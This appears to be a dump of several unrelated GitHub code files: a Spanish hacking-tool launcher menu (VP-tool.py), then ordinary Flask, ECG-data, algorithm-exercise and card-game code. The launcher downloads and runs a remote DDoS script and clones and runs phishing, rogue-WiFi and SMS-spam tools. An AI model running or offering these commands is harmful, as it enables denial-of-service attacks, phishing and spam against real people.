os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n 
print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute tool\")\r\n print(\" | 3 -->> Exit\")\r\n option = input(\" ↳ \")\r\n\r\n print(\"\")\r\n if option == \"1\":\r\n yellow()\r\n print(\"\")\r\n print(\"Downloading...\")\r\n os.system(\"curl https://raw.githubusercontent.com/yorkox0/exaple01/main/ddos.py -o ddos.py\")\r\n red()\r\n print(\"Downloaded!!\")\r\n time.sleep(2)\r\n while True:\r\n ddos()\r\n\r\n if option == \"2\":\r\n print(\"\")\r\n os.system(\"python3 ddos.py\")\r\n\r\n if option == \"3\":\r\n start_menu()\r\ndef freestresser():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n red() \r\n print(\" 1 -->> Web Tool\")\r\n print(\" 2 -->> Exit \")\r\n option = input(\" -->>\")\r\n if option == \"1\":\r\n webbrowser.open_new(\"https://freestresser.to/\")\r\n if option == \"2\":\r\n start_menu()\r\ndef Linset():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n red() \r\n print(\" 1 -->> Download Tool 1 \")\r\n print(\" 2 -->> download Tool 2 (utilizar desp de haber instalado el down 1\")\r\n print(\" 3 -->> download Tool 3 (utilizar desp de haber instalado el down 2\")\r\n print(\" 4 -->> Execute Tool \")\r\n print(\" 5 -->> Exit \")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"cd\")\r\n os.system(\"git clone https://github.com/creadpag/linset.git \")\r\n os.system(\"sudo leafpad /etc/apt/sources.list\")\r\n os.system(\"sudo deb http://ftp.de.debian.org/debian testing main contrib non-free\")\r\n os.system(\"sudo deb http://ftp.debian.org/debian/ jessie-updates main contrib non-free\")\r\n os.system(\"sudo deb http://security.debian.org/ jessie/updates main contrib non-free\")\r\n time.sleep(5)\r\n while True:\r\n linset()\r\n if option == \"2\":\r\n os.system(\"apt-get update\")\r\n os.system(\"apt-get upgrade\")\r\n time.sleep(1)\r\n while True:\r\n linset()\r\n\r\n if option == \"3\":\r\n os.system(\"apt-get install isc-dhcp-server\")\r\n os.system(\"apt-get install hostapd\")\r\n os.system(\"apt-get install lighttpd\")\r\n os.system(\"apt-get install Php5-cgi\")\r\n time.sleep(5)\r\n os.system(\"clear\")\r\n start_menu()\r\n if option == \"4\":\r\n os.system(\"cd\")\r\n os.system(\" cd linset\")\r\n os.system(\"chmod +x linset\")\r\n os.system(\"./linset\")\r\n if option == \"5\":\r\n start_menu()\r\ndef phishing():\r\n os.system(\"clear\")\r\n\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute tool\")\r\n print(\" | 3 -->> Exit\")\r\n option = input(\" ↳ \")\r\n\r\n print(\"\")\r\n if option == \"1\":\r\n \r\n yellow()\r\n os.system(\"git clone https://github.com/htr-tech/zphisher\")\r\n print(\"\")\r\n red()\r\n print(\"Downloaded!!\")\r\n time.sleep(1)\r\n while True:\r\n phishing()\r\n\r\n if option == \"2\":\r\n print(\"\")\r\n os.system(\"mv zphisher/* .\")\r\n os.system(\"mv zphisher/.sites .\")\r\n os.system(\"bash zphisher.sh\")\r\n\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\n\r\ndef wpscan():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n blue()\r\n print(\"\")\r\n purple()\r\n web = input(\"Web whith https:// -->> \")\r\n yellow()\r\n print(\"Do you want to save it on web.txt? 
y/n\")\r\n if input(\"-->> \") == \"y\":\r\n os.system(\"wpscan --url \"+web +\">> web.txt\")\r\n red()\r\n print(\"Saved!!\")\r\n time.sleep(1)\r\n while True:\r\n start_menu()\r\n else:\r\n os.system(\"wpscan --url \"+web)\r\n red()\r\n input(\"Press INTRO to exit\")\r\n while True:\r\n decoracion()\r\n start_menu()\r\n\r\ndef eviltrust():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\")\r\n\r\n option = input(\" +-> \")\r\n if option == \"1\":\r\n print(\"Downloading...\")\r\n yellow()\r\n os.system(\"git clone https://github.com/s4vitar/evilTrust\")\r\n red()\r\n print(\"Downloaded!\")\r\n time.sleep(2)\r\n while True:\r\n eviltrust()\r\n\r\n if option == \"2\":\r\n os.system(\"mv evilTrust/* .\")\r\n os.system(\"clear\")\r\n os.system(\"sudo bash evilTrust.sh -m terminal\")\r\n\r\n if option == \"3\":\r\n decoracion()\r\n start_menu()\r\n\r\ndef sms():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\")\r\n\r\n option = input(\" +-> \")\r\n if option == \"1\":\r\n print(\"Downloading...\")\r\n yellow()\r\n os.system(\"git clone https://github.com/Darkmux/SETSMS\")\r\n red()\r\n print(\"Downloaded!\")\r\n time.sleep(2)\r\n while True:\r\n sms()\r\n\r\n if option == \"2\":\r\n os.system(\"mv SETSMS/* .\")\r\n os.system(\"chmod 777 SETSMS.sh\")\r\n os.system(\"bash SETSMS.sh\")\r\n\r\n if option == \"3\":\r\n decoracion()\r\n start_menu()\r\n\r\n \r\nfrom sys import stdout\r\n\r\ndef red():\r\n RED = \"\\033[1;31m\"\r\n stdout.write(RED)\r\n\r\ndef green():\r\n GREEN = \"\\033[0;32m\"\r\n stdout.write(GREEN)\r\n\r\n\r\ndef blue():\r\n BLUE = \"\\033[1;34m\"\r\n stdout.write(BLUE)\r\n\r\ndef yellow():\r\n YELLOW = \"\\033[1;33m\"\r\n stdout.write(YELLOW)\r\n\r\ndef purple():\r\n PURPLE = \"\\033[1;35m\"\r\n stdout.write(PURPLE)\r\n\r\ndef white():\r\n WHITE = \"\\033[1;37m\"\r\n stdout.write(WHITE)\r\n\r\n\r\n\r\ndef decoracion():\r\n # hola\r\n print(\"1 --comprobacion de ip\")\r\n print(\"2 --> IPtracker\")\r\n print(\"3 --> msfVenom\")\r\n print(\"4 --> goyscript\")\r\n print(\"5 --> ghostF\")\r\n print(\"6 --> phoneinfoga\")\r\n print(\"7 --> Ddos\")\r\n print(\"8 -->freestresser\")\r\n print(\"9 --> Linset\")\r\n print(\"10 --> Zphisher\")\r\n print(\"11 --> eviltrust\")\r\n print(\"12 --> Spam SMS\")\r\n print(\"13 -->FAKEsms\")\r\n print(\"14 --Exit\")\r\n option = input(\" +-> \")\r\n\r\n if option == \"1\":\r\n comprIP()\r\n if option == \"2\":\r\n IPtracker()\r\n if option == \"3\":\r\n msf()\r\n if option == \"4\":\r\n Goyscript()\r\n if option == \"5\":\r\n Ghostf()\r\n if option == \"6\":\r\n phoneinfoga()\r\n if option == \"7\":\r\n ddos()\r\n if option == \"8\":\r\n freestresser()\r\n if option == \"9\":\r\n Linset()\r\n if option == \"10\":\r\n phishing()\r\n if option == \"11\":\r\n eviltrust()\r\n if option == \"12\":\r\n sms()\r\n if option == \"13\":\r\n fakesms()\r\n if option == \"14\":\r\n os.system(\"clear\")\r\n exit()\r\n\r\nbanner = \"\"\"\r\n__ ______ _ _ \r\n\\ \\ / / _ \\ | |_ ___ ___ | | \r\n \\ \\ / /| |_) |____| __/ _ \\ / _ \\| |\r\n \\ V / | __/_____| || (_) | (_) | |\r\n \\_/ |_| \\__\\___/ \\___/|_|\r\n V\r\n 2\r\n\"\"\"\r\nprint(banner)\r\n\r\n# <-- iniciar la tool 
-->\r\ndecoracion()\r\nstart_menu()\r\n","repo_name":"mouse3/VP-tool","sub_path":"VP-tool.py","file_name":"VP-tool.py","file_ext":"py","file_size_in_byte":14800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"9317563174","text":"from flask import render_template, request, Blueprint\n\nfrom Lab7.models import SearchService\n\nfrom .method import Method\n\nblueprint = Blueprint('search', __name__)\nsearch_service = SearchService()\n\n\n@blueprint.route('/search', methods=[Method.GET, Method.POST])\ndef index():\n    authors = search_service.get_authors()\n    publishers = search_service.get_publishers()\n    genres = search_service.get_genres()\n\n    if request.form.get('clear'):\n        selected_genres = []\n        selected_publishers = []\n        selected_authors = []\n    else:\n        selected_genres = list(map(int, request.form.getlist('genre_id')))\n        selected_publishers = list(map(int, request.form.getlist('publisher_id')))\n        selected_authors = list(map(int, request.form.getlist('author_id')))\n\n    cards = search_service.get_cards(selected_genres, selected_publishers, selected_authors)\n\n    html = render_template(\n        'search.jinja2',\n        authors=authors,\n        publishers=publishers,\n        genres=genres,\n        cards=cards,\n        selected_authors=selected_authors,\n        selected_publishers=selected_publishers,\n        selected_genres=selected_genres,\n        len=len\n    )\n    return html\n","repo_name":"markov-avl/PythonBackend","sub_path":"Lab7/controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"7200541174","text":"# Solved using itertools' combinations.\n# Returns a total of nCk tuples in list form\n\nfrom itertools import combinations\n\nwhile True:\n    test = input()\n    if test == \"0\":\n        break\n\n    k, *s = list(test.split())\n    for i in combinations(s, 6):\n        print(\" \".join(i))\n    print()\n\n\n","repo_name":"seong-wooo/Algorithm_Study","sub_path":"백준/BOJ 길라잡이 베타(1) 문제집/6603_로또.py","file_name":"6603_로또.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"35067386430","text":"# Write a function `can_construct(target, word_bank)` that accepts a\n# target string and an array of strings.\n\n# The function should return a boolean indicating whether or not the\n# `target` can be constructed by concatenating elements of the\n# `word_bank` array.\n\n# You may reuse elements of word_bank as many times as needed.\n\ndef can_construct(target, word_bank):\n    tab = [False for _ in range(len(target) + 1)]\n    tab[0] = True\n    i = 0\n    while i <= len(target):\n        if tab[i] == True:\n            for word in word_bank:\n                # if the word matches the characters starting at position i\n                if i + len(word) <= len(target) and target[i:].startswith(word):\n                    tab[i + len(word)] = True\n        i += 1\n    return tab[len(target)]\n\n# m = len(target)\n# n = len(word_bank)\n# Time: O(m*n*m) -> O(m^2 * n)\n# Space: O(m)\n\nprint(can_construct(\"abcdef\", [\"ab\", \"abc\", \"cd\", \"def\", \"abcd\"]))\nprint(can_construct(\"skateboard\", [\"bo\", \"rd\", \"ate\", \"t\", \"ska\", \"sk\", \"boar\"]))\nprint(can_construct(\"enterapotentpot\", [\"a\", \"p\", \"ent\", \"enter\", \"ot\", \"o\", \"t\"]))\nprint(can_construct(\"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeef\", [\"e\", \"ee\", \"eee\", \"eeee\", \"eeeee\", 
\"eeeeee\"]))\n","repo_name":"matt-morales/interview_examples","sub_path":"algos_practice/dynamic_programming/tabulation/can_construct.py","file_name":"can_construct.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71737958123","text":"import os\nimport glob\nimport json\nimport logging\nfrom typing import List, Union\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\nimport h5py\nimport wfdb.processing\nfrom tqdm import tqdm, trange\n\nfrom ecg_transformer.util import *\nimport ecg_transformer.util.ecg as ecg_util\n\n\ndef fix_g12ec_headers():\n \"\"\"\n The 1st row of header files in G12EC datasets has an extra `.mat` in the record name\n \"\"\"\n recs = ecg_util.get_rec_paths('G12EC')\n ic(recs[:5], len(recs))\n for r in recs:\n r = r.removesuffix('.mat') + '.hea'\n with open(r, 'r') as f:\n lns = f.readlines()\n lns[0] = remove_1st_occurrence(lns[0], '.mat')\n with open(r, 'w') as f:\n f.write(''.join(lns))\n\n\nclass RecDataExport:\n \"\"\"\n Integrate & export the 12-lead ECG datasets collected, in standardized format `hdf5`\n\n See the MATLAB versions for exporting denoised signals\n \"\"\"\n\n def __init__(self, fqs=250):\n \"\"\"\n :param fqs: (Potentially re-sampling) frequency\n \"\"\"\n self.path_exp = os.path.join(PATH_BASE, DIR_DSET, config('datasets.my.dir_nm'))\n\n self.lbl_cols = ['dataset', 'patient_name', 'record_name', 'record_path']\n self.fqs = fqs\n\n self.logger = None\n\n def __call__(self, resample: Union[str, bool] = False):\n self.logger: logging.Logger = get_logger('ECG Record Export')\n dnms = config('datasets-export.total')\n self._log_info(f'Exporting ECG records on datasets {logi(dnms)}... ')\n # self.export_record_info()\n # for dnm in dnms:\n for dnm in dnms[1:2]:\n self.export_record_data(dnm, resample=resample)\n # self.export_record_data('CHAP_SHAO', resample) # TODO: debugging\n\n @staticmethod\n def get_rec_nms(dnm):\n d_dset = config(f'datasets.{dnm}')\n return sorted(\n glob.iglob(os.path.join(PATH_BASE, DIR_DSET, d_dset['dir_nm'], d_dset['rec_fmt']), recursive=True)\n )\n\n def get_dset_record_info(self, dnm, return_df=True) -> Union[pd.DataFrame, List[List]]:\n d_dset = config(f'datasets.{dnm}')\n dir_nm = d_dset['dir_nm']\n path_ = os.path.join(PATH_BASE, DIR_DSET, dir_nm)\n\n def get_get_pat_num():\n def incart(fnm_):\n path_no_ext = fnm_[:fnm_.index('.')]\n rec = wfdb.rdrecord(path_no_ext, sampto=1) # Don't need to see the signal\n return rec.comments[1]\n\n def ptb_xl(path_r_no_dset):\n if not hasattr(ptb_xl, 'df__'):\n ptb_xl.df__ = pd.read_csv(\n os.path.join(path_, 'ptbxl_database.csv'), usecols=['patient_id', 'filename_hr']\n )\n return int(ptb_xl.df__[ptb_xl.df__.filename_hr == path_r_no_dset].iloc[0]['patient_id'])\n\n def ptb_diagnostic(rec_nm):\n if not hasattr(ptb_diagnostic, 'df__'):\n fnm_ = config(f'{DIR_DSET}.{dnm}.path_label')\n with open(os.path.join(PATH_BASE, DIR_DSET, dir_nm, fnm_)) as f:\n ptb_diagnostic.df__ = pd.DataFrame(\n [ln.split('/') for ln in map(str.strip, f.readlines())],\n columns=['patient_nm', 'rec_nm']\n )\n return ptb_diagnostic.df__[ptb_diagnostic.df__.rec_nm == rec_nm].iloc[0]['patient_nm']\n\n def one2one():\n \"\"\" From dataset description, we have one-to-one mapping of patient to record \"\"\"\n if not hasattr(one2one, 'n'):\n one2one.n = 0\n n = one2one.n\n one2one.n += 1\n return n\n\n def na():\n if not hasattr(na, 'nan'):\n na.nan = float('nan')\n return na.nan\n\n d_f = {\n 
'INCART': incart,\n 'PTB-XL': ptb_xl,\n 'PTB-Diagnostic': ptb_diagnostic,\n 'CSPC-CinC': one2one,\n 'CSPC-Extra-CinC': na, # Unknown, suspect multiple records for a single patient\n 'G12EC': na, # Patient info not available & multiple records for a single patient\n 'CHAP-SHAO': one2one,\n 'CODE-TEST': one2one\n }\n return d_f[dnm]\n\n get_pat_num = get_get_pat_num()\n\n def get_relative_path_n_name(fnm_):\n \"\"\"\n :return: 2-tuple of from (`datasets` to record file name], and file name without extension\n \"\"\"\n path_r = fnm_.split('/')\n return '/'.join(path_r[path_r.index(dir_nm):-1]), Path(fnm_).stem\n\n def get_row(fnm_):\n path_r, rec_nm = get_relative_path_n_name(fnm_)\n d_args = {\n 'INCART': [fnm_],\n 'PTB-XL': [f'{path_r}/{rec_nm}'[len(dnm)+1:]],\n 'PTB-Diagnostic': [rec_nm],\n 'CSPC-CinC': [],\n 'CSPC-Extra-CinC': [],\n 'G12EC': [],\n 'CHAP-SHAO': []\n }\n pat_nm = get_pat_num(*d_args[dnm])\n return [dnm, pat_nm, rec_nm, path_r]\n\n def get_row_code_test(rec_nms_):\n assert len(rec_nms_) == 1 # Only 1 hdf5 file\n fnm_ = rec_nms_[0]\n path_r, rec_nm = get_relative_path_n_name(fnm_)\n n_pat = h5py.File(fnm_, 'r')['tracings'].shape[0]\n rows_ = []\n for i in trange(n_pat, desc='CODE-TEST', unit='rec'):\n rows_.append([dnm, i, rec_nm, path_r])\n return rows_\n\n self._log_info(f'Getting record info for {logi(dnm)}... ')\n rec_nms = self.get_rec_nms(dnm)\n if dnm == 'CODE-TEST':\n rows = get_row_code_test(rec_nms)\n else:\n rows = []\n for fnm in tqdm(rec_nms, desc=dnm, unit='rec'):\n rows.append(get_row(fnm))\n return pd.DataFrame(rows, columns=self.lbl_cols) if return_df else rows\n\n def export_record_info(self):\n self._log_info(f'Exporting dataset record info... ')\n df = pd.DataFrame(\n sum([self.get_dset_record_info(dnm, return_df=False) for dnm in config('datasets-export.total')], start=[]),\n columns=self.lbl_cols\n )\n df = df.apply(lambda x: x.astype('category'))\n fnm = os.path.join(self.path_exp, config('datasets.my.fnm_labels'))\n df.to_csv(fnm)\n self._log_info(f'ECG record info exported to {logi(fnm)}')\n\n def _log_info(self, msg):\n if self.logger is not None:\n self.logger.info(msg)\n\n def export_record_data(self, dnm, resample: Union[bool, str] = True):\n \"\"\"\n :param dnm: Dataset name\n :param resample: If true, resample to export `fqs`\n If `single`, keep *only* the resampled copy\n \"\"\"\n if self.logger is not None:\n self.logger.info(f'Exporting {logi(dnm)} data... ')\n assert dnm in config('datasets-export.total')\n\n rec_nms = self.get_rec_nms(dnm)\n # rec_nms = rec_nms[:1024] # TODO: debugging\n sigs = np.stack(batched_conc_map(\n lambda fnms_, s_, e_: [ecg_util.fnm2sigs(nm_, dnm) for nm_ in fnms_[s_:e_]], rec_nms)\n )\n # ic(sigs, sigs.shape, sigs.dtype)\n fqs = config(f'datasets.{dnm}.fqs')\n d_rec = dict(n=len(rec_nms), shape=sigs.shape, dtype=sigs.dtype, frequency=fqs)\n self._log_info(f'Loaded record data: {log_dict(d_rec)}')\n shape = sigs.shape\n assert len(shape) == 3 and shape[0] == len(rec_nms) and shape[1] == 12\n assert not np.isnan(sigs).any()\n\n _resample = resample and self.fqs != fqs\n sigs_ = []\n if _resample:\n def _resampler(sig: np.array) -> np.array: # `resample_sig` seems to work with 1D signal only\n return wfdb.processing.resample_sig(sig, fqs, self.fqs)[0]\n\n def resampler(sigs__: np.ndarray) -> np.ndarray:\n return np.stack([_resampler(sig) for sig in sigs__])\n self._log_info(f'Resampling to {logi(self.fqs)}Hz... 
')\n lst_sigs = []\n for s in tqdm(sigs, desc='Resampling', unit='rec'):\n lst_sigs.append(resampler(s))\n sigs_ = np.stack(lst_sigs)\n fqs = self.fqs\n dsets = dict(data=sigs_ if resample else sigs)\n if _resample and resample != 'single':\n dsets['ori'] = sigs\n attrs = dict(dnm=dnm, fqs=fqs, resampled=resample)\n # ic(type(resample))\n fnm = os.path.join(self.path_exp, config('datasets.my.rec_fmt') % dnm)\n self._log_info(f'Writing processed signals to {logi(fnm)}...')\n open(fnm, 'a').close() # Create file in OS\n fl = h5py.File(fnm, 'w')\n fl.attrs['meta'] = json.dumps(attrs)\n # TODO: reduce memory usage\n self._log_info(f'Metadata attributes {logi(list(fl.attrs.keys()))} added')\n for nm, data in dsets.items():\n fl.create_dataset(nm, data=data)\n self._log_info(f'HDF5 dataset on {logi(dnm)} with splits {logi([nm for nm in fl])} written to file ')\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n from icecream import ic\n\n np.random.seed(config('random-seed'))\n # fix_g12ec_headers()\n\n def export():\n de = RecDataExport(fqs=250)\n de(resample='single')\n # export()\n\n def sanity_check():\n \"\"\"\n Check the MATLAB h5 output working properly\n \"\"\"\n dnm = 'CHAP_SHAO'\n d_dset = config(f'datasets.my')\n path_exp = os.path.join(PATH_BASE, DIR_DSET, d_dset['dir_nm'])\n fnm = os.path.join(path_exp, d_dset['rec_fmt_denoised'] % dnm)\n ic(fnm)\n rec = h5py.File(fnm, 'r')\n ic(rec, list(rec.keys()), list(rec.attrs))\n\n data = rec['data']\n ic(type(data), data.shape, data[0, :3, :5])\n ic(rec.attrs['meta'])\n\n # Check which signal is denoised, those not-yet denoised are filled with 0\n idx_filled = np.array([not np.all(d == 0) for d in data])\n ic(idx_filled.shape, idx_filled[:10])\n ic(np.count_nonzero(idx_filled))\n # sanity_check()\n\n def check_matlab_out():\n \"\"\"\n Check the MATLAB data processing output quality\n \"\"\"\n from matplotlib.widgets import Button\n\n # dnm = 'CHAP_SHAO'\n dnm = 'PTB-XL'\n d_dset = config(f'datasets.my')\n path_exp = os.path.join(PATH_BASE, DIR_DSET, d_dset['dir_nm'])\n rec_ori = h5py.File(os.path.join(path_exp, d_dset['rec_fmt'] % dnm), 'r')\n rec_den = h5py.File(os.path.join(path_exp, d_dset['rec_fmt_denoised'] % dnm), 'r')\n data_den, data_ori = rec_den['data'], rec_ori['data'] # Share frequency\n ic(data_ori.shape)\n n_sig, n_ch, l_ch = data_ori.shape\n\n # sig, truth_denoised = ecg_util.get_nlm_denoise_truth(verbose=False)[:2]\n # ic(sig[:10], truth_denoised[:10], sig.shape)\n # ecg_util.plot_1d(\n # [sig, truth_denoised],\n # label=['Original, resampled', 'Denoised'],\n # title=f'[{dnm}] output generated from dataset',\n # # e=2**11\n # )\n\n # Pick a channel randomly\n def _step(s, c):\n plt.cla()\n ecg_util.plot_1d(\n [data_ori[s, c], data_den[s, c]],\n label=['Original, resampled', 'Denoised'],\n title=f'[{dnm}] Processed Signal random plot: signal {s+1} channel {c+1}',\n new_fig=False,\n show=False,\n # e=2**10\n )\n plt.draw()\n\n class PlotFrame:\n def __init__(self, i=0, n_s=n_sig, n_c=n_ch):\n self.n_s = n_s # TODO: until full dataset ready\n self.n_s = 1024\n self.n_c = n_c\n n = self.n_s * self.n_c\n self.idxs = np.arange(n)\n np.random.shuffle(self.idxs)\n\n self.idx = i\n self.clp = clipper(0, n-1)\n self._set_curr_idx()\n\n def _set_curr_idx(self):\n self.i_s, self.i_c = self.idxs[self.idx] // self.n_c, self.idxs[self.idx] % self.n_c\n\n def next(self, event):\n prev_idx = self.idx\n self.idx = self.clp(self.idx+1)\n if prev_idx != self.idx:\n self._set_curr_idx()\n _step(self.i_s, self.i_c)\n\n def 
prev(self, event):\n prev_idx = self.idx\n self.idx = self.clp(self.idx-1)\n if prev_idx != self.idx:\n self._set_curr_idx()\n _step(self.i_s, self.i_c)\n\n plt.figure(figsize=(18, 6))\n\n init = 0\n pf = PlotFrame(i=init)\n ax = plt.gca()\n btn_next = Button(plt.axes([0.81, 0.05, 0.1, 0.075]), 'Next')\n btn_next.on_clicked(pf.next)\n btn_prev = Button(plt.axes([0.7, 0.05, 0.1, 0.075]), 'Previous')\n btn_prev.on_clicked(pf.prev)\n plt.sca(ax)\n\n # _step(pf.i_s, pf.i_c)\n _step(77, 0)\n plt.show()\n # check_matlab_out()\n\n def exported_to_fp32():\n \"\"\"\n Save disk space on colab, and processing anyway, convert the MATLAB-denoised dataset from fp64 to fp32\n \"\"\"\n fnm = 'PTB-XL-denoised'\n fnm_out = f'{fnm}, fp32'\n fnm = os.path.join(ecg_util.get_processed_path(), f'{fnm}.hdf5')\n fnm_out = os.path.join(ecg_util.get_processed_path(), f'{fnm_out}.hdf5')\n\n rec = h5py.File(fnm, 'r')\n assert list(rec.attrs.keys()) == ['meta'] and list(rec.keys()) == ['data'] and rec['data'].dtype == np.float64\n\n rec_out = h5py.File(fnm_out, 'w')\n rec_out.attrs['meta'] = rec.attrs['meta']\n rec_out.create_dataset('data', data=rec['data'], dtype=np.float32)\n ic(rec_out.attrs['meta'], rec_out.keys())\n # exported_to_fp32()\n\n","repo_name":"StefanHeng/ECG-Representation-Learning","sub_path":"ecg_transformer/preprocess/data_export.py","file_name":"data_export.py","file_ext":"py","file_size_in_byte":13899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"30782539151","text":"import readWords\nimport editDistance\nimport multiprocessing\n\npath = \"english_words.txt\"\n\n\ndef chunk_list(my_word, chunk_size):\n chunk_size = len(my_word) // chunk_size\n return [my_word[i:i + chunk_size] for i in range(0, len(my_word), chunk_size)]\n\n\ndef spell_checker(list_words):\n min_distance = 999999\n suggestion = None\n for word in list_words:\n distance = editDistance.dynamic_soln(word, myword)\n if distance < min_distance:\n suggestion = word\n min_distance = distance\n return suggestion\n\n\nlistOfWords = readWords.read_files(path)\nmyword = input(\"Please input the word \")\nif __name__ == '__main__':\n\n pool = multiprocessing.Pool()\n\n resultList = pool.map(spell_checker, chunk_list(listOfWords, 500))\n\n print(\"Correct spell is\", spell_checker(resultList))\n\n# print \"Suggestion is\",suggestion\n","repo_name":"sankalpbhandari/Spell-Checker","sub_path":"spellChecker.py","file_name":"spellChecker.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38618439289","text":"from tensorflow_probability import distributions as _distributions\n\nfrom .poe import PoE\nfrom .mvn import MultivariateNormalFullCovarianceML, MultivariateNormalFullPrecision, MultivariateNormalIso\nfrom .soft_uniform import SoftUniformNormalCdf, SoftUniform\n# import from tensorflow_probability\nfrom . 
import approx\n\n\nclass MultivariateNormalFullCovariance(_distributions.MultivariateNormalFullCovariance):\n\tdef __init__(self,\n\t\t\t\t loc=None,\n\t\t\t\t covariance_matrix=None,\n\t\t\t\t validate_args=False,\n\t\t\t\t allow_nan_stats=True,\n\t\t\t\t name=\"MultivariateNormalFullCovariance\"):\n\n\t\tself._covariance_matrix = covariance_matrix\n\n\t\t_distributions.MultivariateNormalFullCovariance.__init__(\n\t\t\tself,\n\t\t\tloc,\n\t\t\tcovariance_matrix,\n\t\t\tvalidate_args,\n\t\t\tallow_nan_stats,\n\t\t\tname=name\n\t\t)\n\n\t@property\n\tdef covariance_matrix(self):\n\t\treturn self._covariance_matrix\n\nCategorical = _distributions.Categorical\nMultivariateNormalDiag = _distributions.MultivariateNormalDiag\nMultivariateNormalTriL = _distributions.MultivariateNormalTriL\ntry:\n\tWishart = _distributions.Wishart\nexcept:\n\tWishart = None\nLogNormal = _distributions.LogNormal\nStudentT = _distributions.StudentT\nNormal = _distributions.Normal\nUniform = _distributions.Uniform\n\n\nfrom .mixture_models import *","repo_name":"teguhSL/learning_distribution_gan","sub_path":"tf_robot_learning/tf_robot_learning/distributions/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"12155225275","text":"def permute1(start, rest):\n res = []\n if len(rest) <= 1:\n res += [start + rest, rest + start]\n else:\n for i, c in enumerate(rest):\n s = rest[:i] + rest[i+1:]\n for perm in permute1(c, s):\n res += [start + perm]\n return res\n\n\n\nprint(permute1('', 'google'))","repo_name":"defjam903/Google-Interview-prep","sub_path":"Basics/Sample Run.py","file_name":"Sample Run.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"19"} +{"seq_id":"28270582259","text":"import random\n\nimport pytest\n\nfrom .maumau import MauMau\n\n\n@pytest.fixture\ndef default_game():\n random.seed(2)\n return MauMau(\"g1\", [\"p1\", \"p2\"])\n\n\ndef test_new(default_game):\n g = default_game\n assert (\n len(g.playing_stack)\n + len(g.stack)\n + sum([len(p.cards) for p in g.players.values()])\n == 32\n )\n assert g.status(\"p1\")\n\n\ndef test_full_game(default_game):\n g = default_game\n g.status(\"p1\")\n g.status(\"p2\")\n g.action(\"p1\", \"play_card\", \"C-Q\")\n g.action(\"p2\", \"play_card\", \"D-9\")\n g.status(\"p1\")\n g.action(\"p1\", \"play_card\", \"S-9\")\n g.action(\"p2\", \"play_card\", \"S-J\")\n g.action(\"p1\", \"play_card\", \"S-7\")\n g.action(\"p2\", \"play_card\", \"H-7\")\n g.action(\"p1\", \"take_card\")\n g.action(\"p1\", \"play_card\")\n g.status(\"p1\")\n g.status(\"p2\")\n g.action(\"p2\", \"play_card\", \"H-7\")\n g.action(\"p2\", \"play_card\", \"H-J\")\n g.action(\"p1\", \"take_card\")\n g.action(\"p1\", \"keep_card\")\n g.status(\"p2\")\n assert g.status(\"p2\").get(\"winner\") is None\n g.action(\"p2\", \"play_card\", \"H-A\")\n assert g.status(\"p2\").get(\"winner\") == \"p2\"\n g.status(\"p2\")\n g.action(\"p1\", \"play_card\")\n g.action(\"p2\", \"play_card\")\n assert g.status(\"p2\").get(\"winner\") == \"p2\"\n assert g.status(\"p1\").get(\"your_deck\") == [\n \"C-8\",\n \"C-A\",\n \"C-Q\",\n \"S-8\",\n \"S-K\",\n \"C-J\",\n \"D-A\",\n \"D-J\",\n ]\n\n\ndef test_illegal_moves(default_game):\n g = default_game\n g.action(\"p2\", \"play_card\", \"D-9\"),\n g.action(\"p1\", \"play_card\", \"C-Q\"),\n g.action(\"p2\", \"play_card\", \"A-A\"),\n 
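# illegal or out-of-turn plays (\"A-A\", \"XX\") must be handled gracefully, not raise\n    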
g.action(\"p2\", \"play_card\", \"XX\"),\n\n\ndef test_check_card(default_game):\n g = default_game\n assert g.status(\"p2\")[\"deck_top\"] == \"D-K\"\n assert g.check_card(\"A-B\") == None\n assert g.check_card(\"D-9\") == True\n assert g.check_card(\"H-9\") == False\n\n\ndef test_take_all_cards(default_game):\n g = default_game\n assert len(g.stack) == len(g.allowed_cards) - len(g.players) * 5 - 1\n assert len(list(g.pick_cards(1))) == 1\n\n # one card on playing stack\n assert len(g.playing_stack) == 1\n assert g.status(\"p1\").get(\"deck_top\") == \"D-K\"\n # take 18 cards\n lots_of_cards = list(g.pick_cards(18))\n assert len(lots_of_cards) == 18\n # play 18 cards on top of the deck\n g.playing_stack.extend(lots_of_cards)\n assert len(g.playing_stack) == 1 + 18\n assert g.status(\"p1\").get(\"deck_top\") == \"C-K\"\n\n assert len(g.stack) == 2\n # take more cards than in there:\n # 2 (from 